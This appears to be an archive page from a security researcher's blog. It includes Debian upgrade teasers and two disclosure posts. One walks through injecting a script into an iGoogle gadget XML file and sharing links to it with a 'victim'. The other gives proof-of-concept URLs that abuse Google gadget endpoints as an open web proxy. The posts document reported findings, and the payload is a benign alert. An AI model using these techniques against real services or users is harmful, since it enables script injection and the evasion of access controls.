Introduction

GNU/Linux Debian Lenny security support has been dropped since a few days (since the 6th of February to be exact). All administrators are encouraged to upgrade their system from Lenny (5.0) to Squeeze (6.0) as soon as possible.

In my previous article I explained how I migrated my dom0 to Squeeze, so now it’s time for me to explain how I did the same thing for domUs.

Read the rest of this entry

Introduction

GNU/Linux Debian Lenny security support has been dropped since a few days (since the 6th of February to be exact). All administrators are encouraged to upgrade their system from Lenny (5.0) to Squeeze (6.0) as soon as possible.

I only had one server left running Lenny, so yesterday I decided to upgrade it. Everything went… well, I won’t say smooth but less than 24 hours later, everything is running again. Not so bad for a migration. :)

Read the rest of this entry

FTP sniffing virus

Something new and completely unexpected happened to me last sunday night around 8pm (what totally fucked up the end of my weekend).

First I was alerted by Google Webmaster Tools (GWT) that my websites were not in good health, just as it’s shown in this screenshot I found on Google images:

Read the rest of this entry

iGoogle is a service of Google. Its features include the capability to add web feeds a personalized homepage. Google also allows all users to create a special gadget.

  1. Write crafted gadget
  2. Submit crafted gadget
  3. Share it
  4. Exploit it !

Then, we go …

1. Write crafted gadget

I’ve get the “Google News” gadget by downloading the following XML file:

http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml

and added my <script> at the end like this :

…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>

 

2. Submit crafted gadget

I’ve uploaded my xml here: http://www.makyoto.fr/xss/poc.xml

Then, once I’ve customized my gadget, I’ve submitted it here: http://www.google.com/ig/submit

No error was found in the crafted XML file, so it’s OK, my poc.xml is ready to be used as a gadget ^^

 

3. Share it

Easy to share with friends this gadget using the official sharing features. The following links can be sent to the victim:

http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag

or

http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml

 

If you choose to add my gadget, a widget will be now present in the iGoogle dashboard.

 

4. Exploit it !

You are bad guys …

 

Google Security Team answered me “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized « sandbox » for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”

Yes, they’re right because I cannot access to user auth cookies, but I can render and script what I want in the gadget … And, what if an attacker can access to popular gadgets XML files ?

Nevertheless I continue to believe that there is vulnerability because the XML file isn’t sufficiently sanitized before being processed.

 

Tweets are welcome @MaKyOtOx and @devquotes

, , , , ,

GaaP: Google as a Proxy

Il existe plusieurs façons d’utiliser les sites de Google comme proxies HTTP :

Il existe au moins deux autres manières d’utiliser Google comme proxy, et ce en passant au travers des gadgets dédiés au portail iGoogle. Ces deux méthodes sont accessibles sans authentification préalable :

PoC#1 : http://www.ig.gmodules.com/gadgets/proxy/container=ig&gadget=http%3A%2F%2Fgoogle.com/http://www.site_interdit.xxx
(oui oui, la fin de la payload est étrange mais c’est normal)
PoC#2 : http://www.ig.gmodules.com/gadgets/makeRequest?httpMethod=GET&container=ig&url=http%3A%2F%2Fwww.site_interdit.xxx

Pour les 2 PoC, un fichier « p.txt » sera téléchargé. Il s’agit de la réponse votre requête.

L’équipe sécu de Google a été contactée ; elle considère qu’il s’agit d’une « by design feature ». Quelques limitations d’utilisation ont été mises en place comme la restriction aux protocoles HTTP(S) et un jeu de ports définis.

Comments are welcome !

,